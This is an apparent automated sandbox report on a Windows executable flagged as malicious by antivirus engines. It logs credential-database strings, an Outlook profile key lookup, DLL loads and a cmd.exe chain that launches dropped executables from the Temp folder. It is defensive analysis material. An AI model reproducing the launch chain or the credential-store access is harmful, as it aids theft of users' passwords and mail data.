Source: C:\Users\user\Desktop\Rnteb46TuM.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Rnteb46TuM.exe, 00000000.00000003.2184576548.0000000023068000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000003.2170995547.0000000023074000.00000004.00000020.00020000.00000000.sdmp, GIIEGHIDBGHIECAAECGD.0.dr, JEBKECAFIDAFIECBKEHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Rnteb46TuM.exe Virustotal: Detection: 82%
Source: Rnteb46TuM.exe ReversingLabs: Detection: 91%
Source: AFBFHDBKJE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Rnteb46TuM.exe String found in binary or memory: uy/AdD
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File read: C:\Users\user\Desktop\Rnteb46TuM.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Rnteb46TuM.exe "C:\Users\user\Desktop\Rnteb46TuM.exe"
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe" Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: Rnteb46TuM.exe Static file information: File size 2509824 > 1048576
Source: Rnteb46TuM.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x221800
